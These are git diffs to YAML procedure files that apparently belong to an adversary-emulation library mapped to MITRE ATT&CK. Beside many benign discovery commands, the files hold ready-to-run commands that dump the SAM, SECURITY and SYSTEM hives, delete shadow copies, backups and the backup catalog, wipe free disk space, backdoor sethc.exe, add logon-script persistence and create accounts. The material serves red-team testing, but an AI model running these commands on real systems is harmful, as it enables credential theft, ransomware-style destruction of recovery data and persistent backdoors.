+      Prints the kernel diagnostic message buffer which includes bootloader information, debug messages, and more, from the current system boot.
+tactic: discovery
+technique:
+  id: T1082
+  name: System Information Discovery
+platforms:
+  linux:
+    sh:
+      command: dmesg
+  

--- a/discovery/26c8b8b5-7b5b-4de1-a128-7d37fb14f517.yml
+++ b/discovery/26c8b8b5-7b5b-4de1-a128-7d37fb14f517.yml
@@ -1,9 +1,10 @@
 id: 26c8b8b5-7b5b-4de1-a128-7d37fb14f517
 metadata:
-  version: 1
+  version: 2
   authors:
     - privateducky
     - MITRE
+    - w0rk3r
   tags: []
 name: Discover domain controller
 description: |
@@ -20,4 +21,4 @@ platforms:
         nltest /dsgetdc:%USERDOMAIN%
     psh:
       command: |
-        nltest /dsgetdc:$env:USERDOMAIN
+        ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).DomainControllers

--- a/discovery/37778242-6bd4-11eb-9439-0242ac130002.yml
+++ b/discovery/37778242-6bd4-11eb-9439-0242ac130002.yml
@@ -1,0 +1,21 @@
+id: 37778242-6bd4-11eb-9439-0242ac130002
+metadata:
+  version: 1
+  authors: 
+    - Abhishek S (abhiabhi2306)
+  tags: []
+name: Display authorized SSH keys
+description: |
+  This will list all the authorized SSH public keys of the machine for all users which you have access to.
+tactic: discovery
+technique:
+  id: T1082
+  name: System Information Discovery
+platforms:
+  darwin:
+    sh:
+      command: cat /Users/*/.ssh/authorized_keys
+  linux:
+    sh:
+      command: cat /home/*/.ssh/authorized_keys
+   

--- a/discovery/37b1f68b-acf2-46a1-9a2e-b376e0149a5e.yml
+++ b/discovery/37b1f68b-acf2-46a1-9a2e-b376e0149a5e.yml
@@ -1,0 +1,20 @@
+id: 37b1f68b-acf2-46a1-9a2e-b376e0149a5e
+metadata:
+  version: 1
+  authors: 
+    - v1dhun
+  tags: []
+name: View pathnames of valid login shells
+description: |
+  The /etc/shells is a Linux / UNIX text file which contains the full pathnames of valid login shells.
+tactic: discovery
+technique:
+  id: T1082
+  name: System Information Discovery
+platforms:
+  darwin:
+    sh:
+      command: cat /etc/shells
+  linux:
+    sh:
+      command: cat /etc/shells

--- a/discovery/455118ab-fcd7-4a07-b7ff-d75ef4cd3e5f.yml
+++ b/discovery/455118ab-fcd7-4a07-b7ff-d75ef4cd3e5f.yml
@@ -1,0 +1,21 @@
+id: 455118ab-fcd7-4a07-b7ff-d75ef4cd3e5f
+metadata:
+  version: 1
+  authors:
+    - w0rk3r
+  tags: []
+name: Discover Windows Defender Firewall State
+description: |
+  Get the current state of the Windows Defender Firewall
+tactic: discovery
+technique:
+  id: T1518.001
+  name: "Software Discovery: Security Software Discovery"
+platforms:
+  windows:
+    psh:
+      command: |
+        Get-NetFirewallProfile
+    cmd:
+      command: |
+        netsh advfirewall show allprofiles

--- a/discovery/4a136ba6-66f1-11eb-ae93-0242ac130002.yml
+++ b/discovery/4a136ba6-66f1-11eb-ae93-0242ac130002.yml
@@ -1,0 +1,16 @@
+id: 4a136ba6-66f1-11eb-ae93-0242ac130002 
+metadata:
+  version: 1
+  authors: 
+    - Abhishek S (abhiabhi2306)
+  tags: []
+name: Perform direct registry loot
+description: |
+  The registry can directly looted without using tools like wce,fgdump or external binaries. The dump will be saved to c:\windows\temp\system.save
+technique:
+  id: T1082
+  name: Command and Scripting Interpreter
+platforms:
+  windows:
+    cmd:
+      command: C:\Windows\System32\reg.exe save hklm\sam c:\windows\temp\sam.save && C:\Windows\System32\reg.exe save hklm\security c:\windows\temp\security.save && C:\Windows\System32\reg.exe save hklm\system c:\windows\temp\system.save

--- a/discovery/5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml
+++ b/discovery/5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml
@@ -1,10 +1,13 @@
 id: 5a39d7ed-45c9-4a79-b581-e5fb99e24f65
 metadata:
-  version: 1
+  version: 2
   authors:
     - privateducky
     - MITRE
-  tags: []
+    - khyberspache
+  tags:
+    - APT29
+    - APT29 Scenario 1
 name: System processes
 description: |
   Identify which processes are running on the local computer. This procedure is helpful to get a snapshot in time of
@@ -17,8 +20,18 @@ platforms:
   windows:
     psh:
       command: Get-Process
+      variants:
+        - command: |
+            $ps = get-process;
+            write-output $ps;
     cmd:
       command: tasklist
+      variants:
+        - command: tasklist /v
+    exec:
+      command: tasklist
+      variants:
+        - command: tasklist /v
   darwin:
     pwsh:
       command: Get-Process

--- a/discovery/5b4a7cf6-6bcf-11eb-9439-0242ac130002.yml
+++ b/discovery/5b4a7cf6-6bcf-11eb-9439-0242ac130002.yml
@@ -7,6 +7,7 @@ metadata:
 name: Dump all network configuration data
 description: |
    This command will display all of the system's network configuration information using an approach that is less likely to trigger blue-team monitoring systems.tactic: discovery
+tactic: discovery
 technique:
   id: T1082
   name: System Information Discovery

--- a/discovery/5b4a7cf6-6bcf-11eb-9439-0242ac130002.yml
+++ b/discovery/5b4a7cf6-6bcf-11eb-9439-0242ac130002.yml
@@ -1,0 +1,16 @@
+id: 5b4a7cf6-6bcf-11eb-9439-0242ac130002 
+metadata:
+  version: 1
+  authors: 
+    - Abhishek S (abhiabhi2306)
+  tags: []
+name: Dump all network configuration data
+description: |
+   This command will display all of the system's network configuration information using an approach that is less likely to trigger blue-team monitoring systems.tactic: discovery
+technique:
+  id: T1082
+  name: System Information Discovery
+platforms:
+  linux:
+    sh:
+      command: cat /proc/net/*

--- a/discovery/5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml
+++ b/discovery/5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml
@@ -4,6 +4,7 @@ metadata:
   authors:
     - privateducky
     - MITRE
+    - w0rk3r
   tags: []
 name: Permission Groups Discovery
 description: |
@@ -18,6 +19,9 @@ platforms:
     psh:
       command: |
         gpresult /R
+    cmd:
+      command: |
+        whoami /groups
   darwin:
     sh:
       command: groups

--- a/discovery/638fb6bb-ba39-4285-93d1-7e4775b033a8.yml
+++ b/discovery/638fb6bb-ba39-4285-93d1-7e4775b033a8.yml
@@ -1,10 +1,13 @@
 id: 638fb6bb-ba39-4285-93d1-7e4775b033a8
 metadata:
-  version: 1
+  version: 2
   authors:
     - privateducky
     - MITRE
-  tags: []
+    - khyberspache
+  tags:
+    - APT29
+    - APT29 Scenario 1
 name: Active network connections
 description: |
   Network connections are the persistent computer-to-computer pipelines which allow applications to talk to each other.
@@ -26,3 +29,9 @@ platforms:
     psh:
       command: |
         Get-NetTCPConnection
+    cmd:
+      command: |
+        netstat -ano
+    exec:
+      command: |
+        netstat -ano

--- a/discovery/64e88333-a622-432d-bf4d-71c309053b44.yml
+++ b/discovery/64e88333-a622-432d-bf4d-71c309053b44.yml
@@ -1,0 +1,17 @@
+id: 64e88333-a622-432d-bf4d-71c309053b44
+metadata:
+  version: 1
+  authors: 
+    - Abhishek S (abhiabhi2306)
+  tags: []
+name: Enumerate file system partitions
+description: |
+  This will display all related informations corresponding to the the mounted and unmounted partitions/shares.
+tactic: discovery
+technique:
+  id: T1082
+  name: System Information Discovery
+platforms:
+  linux:
+    sh:
+      command: mount -l && cat /etc/fstab

--- a/discovery/756b6e3d-aab7-4e9e-8bf0-0ccdcea2697f.yml
+++ b/discovery/756b6e3d-aab7-4e9e-8bf0-0ccdcea2697f.yml
@@ -1,0 +1,24 @@
+id: 756b6e3d-aab7-4e9e-8bf0-0ccdcea2697f
+name: Local network share discovery
+description: >-
+  This procedure will look at all of the network share resources that are shared
+  on the local computer.
+tactic: discovery
+technique:
+  id: T1135
+  name: Network Share Discovery
+platforms:
+  linux:
+    sh:
+      command: mount -v | grep -i -e 'type smb' -e 'type cifs'
+  darwin:
+    sh:
+      command: mount -v | grep -i -e 'type smb' -e 'type cifs'
+  windows:
+    cmd:
+      command: net share
+metadata:
+  authors:
+    - bfuzzy1
+  tags: []
+  version: 1

--- a/discovery/7c42a30c-c8c7-44c5-80a8-862d364ac1e4.yml
+++ b/discovery/7c42a30c-c8c7-44c5-80a8-862d364ac1e4.yml
@@ -1,6 +1,6 @@
 id: 7c42a30c-c8c7-44c5-80a8-862d364ac1e4
 metadata:
-  version: 1
+  version: 2
   authors:
     - privateducky
     - MITRE
@@ -16,4 +16,35 @@ technique:
 platforms:
   windows:
     psh:
-      command: echo $(get-uac)
+      command: |
+        function Get-UAC {
+        &lt;#
+          .SYNOPSIS
+            Gets the current status of User Account Control (UAC) on a computer, locally or remote.
+          .DESCRIPTION
+            Gets the current status of User Account Control (UAC) on a computer, locally or remote.
+          .AUTHOR
+            Jeff Wouters
+          .NOTES
+            PowerShell 2.0 or higher is required for proper execution of this script.
+          .EXAMPLE
+            Get-UAC
+          .EXAMPLE
+            Get-UAC -ComputerName [ComputerName]
+          .INPUTS
+            N/A.
+        #&gt;
+          [cmdletBinding(SupportsShouldProcess = $true)];
+          param([parameter(ValueFromPipeline = $false, ValueFromPipelineByPropertyName = $true, Mandatory = $false)][Alias("Computer")][string]$ComputerName);
+          [string]$RegPath = "Software\Microsoft\Windows\CurrentVersion\Policies\System";
+          [string]$RegValue = "EnableLUA";
+          $AccessReg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey([Microsoft.Win32.RegistryHive]::LocalMachine,$ComputerName);
+          $Subkey = $AccessReg.OpenSubKey($RegPath,$false);
+          $Subkey.ToString() | Out-Null;
+          $UAC = ($Subkey.GetValue($RegValue) -eq 1);
+          if ($UAC -eq 1){ $UACConfig = "Enabled" };
+          elseif ($UAC -eq 0) { $UACConfig = "Disabled" };
+          else {$UACConfig = "Unknown"};
+          return $UACConfig;
+        };
+        Get-UAC;

--- a/discovery/83c991b4-5ff0-4fe5-80ab-c78737ccef61.yml
+++ b/discovery/83c991b4-5ff0-4fe5-80ab-c78737ccef61.yml
@@ -1,0 +1,17 @@
+id:83c991b4-5ff0-4fe5-80ab-c78737ccef61
+metadata:
+  version: 1
+  authors: 
+    - Varun
+  tags: []
+name: List group password hashes
+description: |
+  The group hashes for all groups present will be displayed from /etc/gshadow file.
+tactic: discovery
+technique:
+  id: T1082
+  name: System Information Discovery
+platforms:
+  linux:
+    sh:
+      command: cat /etc/gshadow

--- a/discovery/83c991b4-5ff0-4fe5-80ab-c78737ccef61.yml
+++ b/discovery/83c991b4-5ff0-4fe5-80ab-c78737ccef61.yml
@@ -1,4 +1,4 @@
-id:83c991b4-5ff0-4fe5-80ab-c78737ccef61
+id: 83c991b4-5ff0-4fe5-80ab-c78737ccef61
 metadata:
   version: 1
   authors: 

--- a/discovery/85341c8c-4ecb-4579-8f53-43e3e91d7617.yml
+++ b/discovery/85341c8c-4ecb-4579-8f53-43e3e91d7617.yml
@@ -1,10 +1,13 @@
 id: 85341c8c-4ecb-4579-8f53-43e3e91d7617
 metadata:
-  version: 1
+  version: 2
   authors:
     - privateducky
     - MITRE
-  tags: []
+    - khyberspache
+  tags:
+    - APT29 Scenario 1
+    - APT29
 name: Collect ARP details
 description: |
   ARP is a protocol used to map IP addresses to the hardware addresses. This procedure runs a scan to identify which

--- a/discovery/8fc7de44-c830-47c9-b05b-b53b1352e874.yml
+++ b/discovery/8fc7de44-c830-47c9-b05b-b53b1352e874.yml
@@ -1,4 +1,4 @@
-id:8fc7de44-c830-47c9-b05b-b53b1352e874
+id: 8fc7de44-c830-47c9-b05b-b53b1352e874
 metadata:
   version: 1
   authors: 

--- a/discovery/8fc7de44-c830-47c9-b05b-b53b1352e874.yml
+++ b/discovery/8fc7de44-c830-47c9-b05b-b53b1352e874.yml
@@ -1,0 +1,20 @@
+id:8fc7de44-c830-47c9-b05b-b53b1352e874
+metadata:
+  version: 1
+  authors: 
+    - Varun
+  tags: []
+name: View the group file
+description: |
+  The group names of all groups present in the system will be displayed from /etc/group file
+tactic: discovery
+technique:
+  id: T1082
+  name: System Information Discovery
+platforms:
+  darwin:
+    sh:
+      command: cat /etc/group
+  linux:
+    sh:
+      command: cat /etc/group

--- a/discovery/acb538b4-657c-465e-aeb3-67b00774be52.yml
+++ b/discovery/acb538b4-657c-465e-aeb3-67b00774be52.yml
@@ -1,0 +1,18 @@
+id: acb538b4-657c-465e-aeb3-67b00774be52
+metadata:
+  version: 1
+  authors:
+    - w0rk3r
+  tags: []
+name: Pending Updates Discovery
+description: |
+  Enumerates patches pending to be installed
+tactic: discovery
+technique:
+  id: T1082
+  name: System Information Discovery
+platforms:
+  windows:
+    psh:
+      command: |
+        (New-Object -ComObject Microsoft.Update.Session).CreateUpdateSearcher().Search("IsInstalled=0").Updates | select Title

--- a/discovery/b480cb71-713a-42e7-ac18-cb408cb58a40.yml
+++ b/discovery/b480cb71-713a-42e7-ac18-cb408cb58a40.yml
@@ -1,0 +1,21 @@
+id: b480cb71-713a-42e7-ac18-cb408cb58a40
+metadata:
+  version: 1
+  authors:
+    - w0rk3r
+  tags: []
+name: Installed Patches Enumeration
+description: |
+  Enumerates installed patches on the system
+tactic: discovery
+technique:
+  id: T1082
+  name: System Information Discovery
+platforms:
+  windows:
+    psh:
+      command: |
+        (New-Object -ComObject Microsoft.Update.Session).CreateUpdateSearcher().Search("IsInstalled=1").Updates | select Title
+    cmd:
+      command: |
+        wmic qfe list brief

--- a/discovery/c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml
+++ b/discovery/c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml
@@ -3,6 +3,7 @@ metadata:
   version: 1
   authors:
     - privateducky
+    - Abhishek S (abhiabhi2306)
     - MITRE
   tags: []
 name: Find local users
@@ -26,3 +27,5 @@ platforms:
     sh:
       command: |
         cut -d: -f1 /etc/passwd | grep -v '_' | grep -v '#'
+      variants:
+        - command: getent passwd

--- a/discovery/ce7356e0-ae11-46fa-9419-50788e7cca51.yml
+++ b/discovery/ce7356e0-ae11-46fa-9419-50788e7cca51.yml
@@ -1,0 +1,21 @@
+id: ce7356e0-ae11-46fa-9419-50788e7cca51
+name: Powershell Module Logging Configuration Check
+description: |
+  Check if Powershell Module Logging is Enabled
+tactic: discovery
+technique:
+  id: T1518.001
+  name: "Software Discovery: Security Software Discovery"
+platforms:
+  windows:
+    psh:
+      command: |
+        [Bool](Get-ItemProperty 'HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ModuleLogging' -ErrorAction SilentlyContinue).EnableModuleLogging
+    cmd:
+      command: |
+        reg query HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ModuleLogging
+metadata:
+  authors:
+    - w0rk3r
+  tags: []
+  version: 1

--- a/discovery/db87077c-66ed-11eb-ae93-0242ac130002.yml
+++ b/discovery/db87077c-66ed-11eb-ae93-0242ac130002.yml
@@ -1,0 +1,23 @@
+id: db87077c-66ed-11eb-ae93-0242ac130002
+metadata:
+  version: 1
+  authors: 
+    - Abhishek S (abhiabhi2306)
+  tags: []
+name: Dump shell $PATH
+description: |
+  The $PATH environment variable stores the path of directories which the shell checks for executables, and /etc/paths file holds the list of the same.
+tactic: discovery
+technique:
+  id: T1082
+  name: System Information Discovery
+platforms:
+  darwin:
+    sh:
+      command: cat /etc/paths
+  linux:
+    sh:
+      command: echo $PATH
+  windows:
+    pwsh:
+      command: $env:path

--- a/discovery/e75c8d27-c7ff-4069-8f50-3ef4a159a131.yml
+++ b/discovery/e75c8d27-c7ff-4069-8f50-3ef4a159a131.yml
@@ -1,0 +1,21 @@
+id: e75c8d27-c7ff-4069-8f50-3ef4a159a131
+name: Powershell ScriptBlock Logging Configuration Check
+description: |
+  Check if Powershell ScriptBlock Logging is Enabled
+tactic: discovery
+technique:
+  id: T1518.001
+  name: "Software Discovery: Security Software Discovery"
+platforms:
+  windows:
+    psh:
+      command: |
+        [Bool](Get-ItemProperty 'HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging' -ErrorAction SilentlyContinue).EnableScriptBlockLogging
+    cmd:
+      command: |
+        reg query HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
+metadata:
+  authors:
+    - w0rk3r
+  tags: []
+  version: 1

--- a/discovery/e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml
+++ b/discovery/e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml
@@ -1,9 +1,10 @@
 id: e82f39e2-56f8-4f19-8376-b007f9ac5f8a
 metadata:
-  version: 1
+  version: 2
   authors:
     - privateducky
     - MITRE
+    - w0rk3r
   tags: []
 name: Password policy
 description: |
@@ -23,6 +24,41 @@ platforms:
       command: |
         cat /etc/pam.d/common-password
   windows:
-    psh:
+    cmd:
       command: |
         net accounts
+    psh:
+      command: |
+        $GPOSearcher = New-Object System.DirectoryServices.DirectorySearcher;
+        $Filter = '(|(name={31B2F340-016D-11D2-945F-00C04FB984F9}))';
+        $GPOSearcher.filter = "(&(objectCategory=groupPolicyContainer)$Filter)";
+        $GPO = @{};
+        $Properties = $GPOSearcher.FindOne().Properties;
+        $Properties.PropertyNames | ForEach-Object {
+            if ($_ -eq 'objectguid') {
+                $GPO[$_] = (New-Object Guid (,$Properties[$_][0])).Guid
+            }
+            $GPO[$_] = $Properties[$_][0]
+        };
+        $GptTmplPath = $GPO.gpcfilesyspath + "\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf";
+        $ParseArgs =  @{
+            'GptTmplPath' = $GptTmplPath
+            'OutputObject' = $True
+        };
+        $SysVolPath = "\\$((New-Object System.Uri($GptTmplPath)).Host)\SYSVOL";
+        $TargetGptTmplPath = $GptTmplPath;
+        $Policy = New-Object PSObject;
+        Switch -Regex -File $TargetGptTmplPath {
+            "^\[(.+)\]"
+            {
+                $Session = $matches[1].Trim()
+                $Policy | Add-Member Noteproperty $Session (New-Object PSObject)
+            }
+            "(.+?)\s*=(.*)"
+            {
+                $Name, $Value = $matches[1..2]
+                $Values = $Value.split(',') | ForEach-Object { $_.Trim() }
+                $Policy.$Session | Add-Member Noteproperty $Name $Values
+            }
+        };
+        $Policy

--- a/impact/280f0330-e862-44b9-9a57-0459ef118c8d.yml
+++ b/impact/280f0330-e862-44b9-9a57-0459ef118c8d.yml
@@ -1,0 +1,18 @@
+id: 280f0330-e862-44b9-9a57-0459ef118c8d
+name: Delete volume shadow copies
+description: >-
+  This procedure will volume shadow copies to inhibt system recovery using
+  vssadmin.exe.
+tactic: impact
+technique:
+  id: T1490
+  name: Inhibit System Recovery
+platforms:
+  windows:
+    cmd:
+      command: vssadmin.exe delete shadows /all /quiet
+metadata:
+  authors:
+    - bfuzzy1
+  tags: []
+  version: 1

--- a/impact/280f0330-e862-44b9-9a57-0459ef118c8d.yml
+++ b/impact/280f0330-e862-44b9-9a57-0459ef118c8d.yml
@@ -14,5 +14,6 @@ platforms:
 metadata:
   authors:
     - bfuzzy1
-  tags: []
-  version: 1
+  tags:
+    - destructive
+  version: 2

--- a/impact/70fdb233-d8c0-486a-ad1a-ada2f4b8f03e.yml
+++ b/impact/70fdb233-d8c0-486a-ad1a-ada2f4b8f03e.yml
@@ -8,9 +8,8 @@ technique:
 platforms:
   windows:
     cmd:
-      command: >-
-        del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
-        c:\backup*.* c:\*.set c:\*.win c:\*.dsk
+      command: |
+        del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
   linux:
     sh:
       command: find -name "*~" -print -delete

--- a/impact/70fdb233-d8c0-486a-ad1a-ada2f4b8f03e.yml
+++ b/impact/70fdb233-d8c0-486a-ad1a-ada2f4b8f03e.yml
@@ -1,0 +1,21 @@
+id: 70fdb233-d8c0-486a-ad1a-ada2f4b8f03e
+name: Delete backup files
+description: Deletes backup files in a manner similar to Ryuk ransomware.
+tactic: impact
+technique:
+  id: T1490
+  name: Inhibit System Recovery
+platforms:
+  windows:
+    cmd:
+      command: >-
+        del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
+        c:\backup*.* c:\*.set c:\*.win c:\*.dsk
+  linux:
+    sh:
+      command: find -name "*~" -print -delete
+metadata:
+  authors:
+    - bfuzzy1
+  tags: []
+  version: 1

--- a/impact/70fdb233-d8c0-486a-ad1a-ada2f4b8f03e.yml
+++ b/impact/70fdb233-d8c0-486a-ad1a-ada2f4b8f03e.yml
@@ -17,5 +17,6 @@ platforms:
 metadata:
   authors:
     - bfuzzy1
-  tags: []
-  version: 1
+  tags:
+    - destructive
+  version: 2

--- a/impact/c1f5e797-02c8-4756-9283-41b66498bad4.yml
+++ b/impact/c1f5e797-02c8-4756-9283-41b66498bad4.yml
@@ -1,0 +1,21 @@
+id: c1f5e797-02c8-4756-9283-41b66498bad4
+name: Prevent scheduled shutdown
+description: >-
+  This procedure schedules a restart of the host 100 days in the future. Since
+  Windows can only have one restart scheduled at a time it can not force restart
+  the host to update using tools like SCCM.
+tactic: impact
+technique:
+  id: T1529
+  name: System Shutdown/Reboot
+platforms:
+  windows:
+    cmd:
+      command: shutdown /r /t 8640000
+metadata:
+  authors:
+    - bfuzzy1
+    - '@cryps1s'
+  tags:
+    - destructive
+  version: 1

--- a/impact/c9127250-9ec7-4d6c-b673-028a6191cbf9.yml
+++ b/impact/c9127250-9ec7-4d6c-b673-028a6191cbf9.yml
@@ -1,0 +1,18 @@
+id: c9127250-9ec7-4d6c-b673-028a6191cbf9
+metadata:
+  version: 1
+  authors: 
+    - Abhishek S (abhiabhi2306)
+  tags: 
+    - destructive
+name: Shred deleted data
+description: |
+  This will perform shredding on C:/ drive on the deleted data and overwrite that making it impossible to recover the deleted data, this is helpful in scenarios where you need to make deleted data unrecoverable.
+tactic: impact
+technique:
+  id: T1485
+  name: Data Destruction
+platforms:
+  windows:
+    cmd:
+      command: cipher /w:C:\

--- a/impact/e5d4c9b1-4b26-4a2f-a4c8-b46db5f620b4.yml
+++ b/impact/e5d4c9b1-4b26-4a2f-a4c8-b46db5f620b4.yml
@@ -2,7 +2,7 @@ id: e5d4c9b1-4b26-4a2f-a4c8-b46db5f620b4
 name: Delete windows backup catalog
 description: >-
   This procedure will delete the windows backup catalog. This technique is used
-  by numerous ransomeware families and APT malware.
+  by numerous ransomware families and APT malware.
 tactic: impact
 technique:
   id: T1490

--- a/impact/e5d4c9b1-4b26-4a2f-a4c8-b46db5f620b4.yml
+++ b/impact/e5d4c9b1-4b26-4a2f-a4c8-b46db5f620b4.yml
@@ -1,0 +1,18 @@
+id: e5d4c9b1-4b26-4a2f-a4c8-b46db5f620b4
+name: Delete windows backup catalog
+description: >-
+  This procedure will delete the windows backup catalog. This technique is used
+  by numerous ransomeware families and APT malware.
+tactic: impact
+technique:
+  id: T1490
+  name: Inhibit System Recovery
+platforms:
+  windows:
+    cmd:
+      command: wbadmin.exe delete catalog -quiet
+metadata:
+  authors:
+    - bfuzzy1
+  tags: []
+  version: 1

--- a/impact/e5d4c9b1-4b26-4a2f-a4c8-b46db5f620b4.yml
+++ b/impact/e5d4c9b1-4b26-4a2f-a4c8-b46db5f620b4.yml
@@ -14,5 +14,6 @@ platforms:
 metadata:
   authors:
     - bfuzzy1
-  tags: []
-  version: 1
+  tags:
+    - destructive
+  version: 2

--- a/persistence/28f0b748-207a-4e5c-84cc-be13da2ade48.yml
+++ b/persistence/28f0b748-207a-4e5c-84cc-be13da2ade48.yml
@@ -3,7 +3,7 @@ name: Create Local User
 description: Creates a local user on the specified computer
 metadata:
   version: 1
-  author:
+  authors:
     - w0rk3r
   tags:
     - Powerview

--- a/persistence/28f0b748-207a-4e5c-84cc-be13da2ade48.yml
+++ b/persistence/28f0b748-207a-4e5c-84cc-be13da2ade48.yml
@@ -1,0 +1,27 @@
+id: 28f0b748-207a-4e5c-84cc-be13da2ade48
+name: Create Local User
+description: Creates a local user on the specified computer
+metadata:
+  version: 1
+  author:
+    - w0rk3r
+  tags:
+    - Powerview
+tactic: persistence
+technique:
+  id: T1136.001
+  name: "Create Account: Local Account"
+platforms:
+  windows:
+    psh:
+      command: |
+        $AccountPassword = '#{persistence.local.new.user.password}'
+        $SamAccountName = '#{persistence.local.new.user.name}'
+        $ComputerName =  '#{persistence.local.new.user.computer}'
+        $ObjOu = [ADSI]"WinNT://$ComputerName"
+        $ObjUser = $ObjOu.Create('User', $SamAccountName)
+        $ObjUser.SetPassword($AccountPassword)
+        $Null = $ObjUser.SetInfo()
+    cmd:
+      command: |
+        net user #{persistence.local.new.user.name} #{persistence.local.new.user.password} /ADD

--- a/persistence/94f51428-4e71-4011-b634-674b7247e2ce.yml
+++ b/persistence/94f51428-4e71-4011-b634-674b7247e2ce.yml
@@ -1,0 +1,22 @@
+id: 94f51428-4e71-4011-b634-674b7247e2ce
+name: UserInitMprLogonScript Persistence
+description: >-
+  This procedure will add the pneuma agent to the UserInitMprLogonScript
+  registry key. Adversaries may use Windows logon scripts automatically executed
+  at logon initialization to establish persistence. Windows allows logon scripts
+  to be run whenever a specific user or group of users log into a system.
+tactic: persistence
+technique:
+  id: T1037
+  name: Boot or Logon Initialization Scripts
+platforms:
+  windows:
+    cmd:
+      command: >-
+        REG ADD HKCU\Environment /f /v UserInitMprLogonScript /t REG_MULTI_SZ /d
+        "#{agent.location}"
+metadata:
+  authors:
+    - bfuzzy1
+  tags: []
+  version: 1

--- a/persistence/94f51428-4e71-4011-b634-674b7247e2ce.yml
+++ b/persistence/94f51428-4e71-4011-b634-674b7247e2ce.yml
@@ -12,9 +12,8 @@ technique:
 platforms:
   windows:
     cmd:
-      command: >-
-        REG ADD HKCU\Environment /f /v UserInitMprLogonScript /t REG_MULTI_SZ /d
-        "#{agent.location}"
+      command: |
+        REG ADD HKCU\Environment /f /v UserInitMprLogonScript /t REG_MULTI_SZ /d "#{agent.location}"
 metadata:
   authors:
     - bfuzzy1

--- a/persistence/dc6a04c2-535d-4593-b7e4-ff226a449c67.yml
+++ b/persistence/dc6a04c2-535d-4593-b7e4-ff226a449c67.yml
@@ -3,7 +3,7 @@ name: Create Domain User
 description: Creates a new Domain User using the creds of the Current User
 metadata:
   version: 1
-  author:
+  authors:
     - w0rk3r
   tags:
     - destructive

--- a/persistence/dc6a04c2-535d-4593-b7e4-ff226a449c67.yml
+++ b/persistence/dc6a04c2-535d-4593-b7e4-ff226a449c67.yml
@@ -1,0 +1,33 @@
+id: dc6a04c2-535d-4593-b7e4-ff226a449c67
+name: Create Domain User
+description: Creates a new Domain User using the creds of the Current User
+metadata:
+  version: 1
+  author:
+    - w0rk3r
+  tags:
+    - destructive
+tactic: persistence
+technique:
+  id: T1136.002
+  name: "Create Account: Domain Account"
+platforms:
+  windows:
+    psh:
+      command: |
+        $SamAccountName = '#{persistence.local.new.user.name}'
+        $AccountPassword = ConvertTo-SecureString '#{persistence.local.new.user.password}' -AsPlainText -Force
+        Add-Type -AssemblyName System.DirectoryServices.AccountManagement
+        $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain)
+        $User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context)
+        $User.SamAccountName = $SamAccountName
+        $TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword)
+        $User.SetPassword($TempCred.GetNetworkCredential().Password)
+        $User.Enabled = $True
+        $User.PasswordNotRequired = $False
+        $User.DisplayName = $SamAccountName
+        $User.Save()
+        $User
+    cmd:
+      command: |
+        net user #{persistence.local.new.user.name} #{persistence.local.new.user.password} /ADD /DOMAIN

--- a/persistence/f2963403-37a5-46e6-9cd5-f1c255012055.yml
+++ b/persistence/f2963403-37a5-46e6-9cd5-f1c255012055.yml
@@ -1,0 +1,23 @@
+id: f2963403-37a5-46e6-9cd5-f1c255012055
+name: Image File Execution Options Injection
+description: >-
+  This procedure makes a backup of the setchc.exe utility and modifies a
+  registry key that configures a pnuema agent as a "debugger" for sethc.exe
+  providing persistent backdoor access.
+tactic: persistence
+technique:
+  id: T1546
+  name: Event Triggered Execution
+platforms:
+  windows:
+    cmd:
+      command: >-
+        copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
+        && reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File
+        Execution Options\sethc.exe" /v Debugger /t REG_SZ /d
+        "#{agent.location}"
+metadata:
+  authors:
+    - bfuzzy1
+  tags: []
+  version: 1

--- a/persistence/f2963403-37a5-46e6-9cd5-f1c255012055.yml
+++ b/persistence/f2963403-37a5-46e6-9cd5-f1c255012055.yml
@@ -11,11 +11,8 @@ technique:
 platforms:
   windows:
     cmd:
-      command: >-
-        copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
-        && reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File
-        Execution Options\sethc.exe" /v Debugger /t REG_SZ /d
-        "#{agent.location}"
+      command: |
+        copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe & reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "#{agent.location}"
 metadata:
   authors:
     - bfuzzy1

--- a/privilege-escalation/493da525-275b-4026-9390-751ba35e5c5b.yaml
+++ b/privilege-escalation/493da525-275b-4026-9390-751ba35e5c5b.yaml
@@ -1,0 +1,19 @@
+id: 493da525-275b-4026-9390-751ba35e5c5b
+metadata:
+  version: 1
+  authors:
+    - c14dd49h
+  tags: []
+name: Enumerate sudoers data
+description: |
+    Runs two commands to enumerate the current users sudo permissions and also dumps the /etc/sudoers file for the system
+tactic: privilege-escalation
+technique:
+  id: T1548.003
+  name: Abuse Elevation Control Mechanism
+platforms:
+  linux:
+    sh:
+      command: |
+        sudo -l;
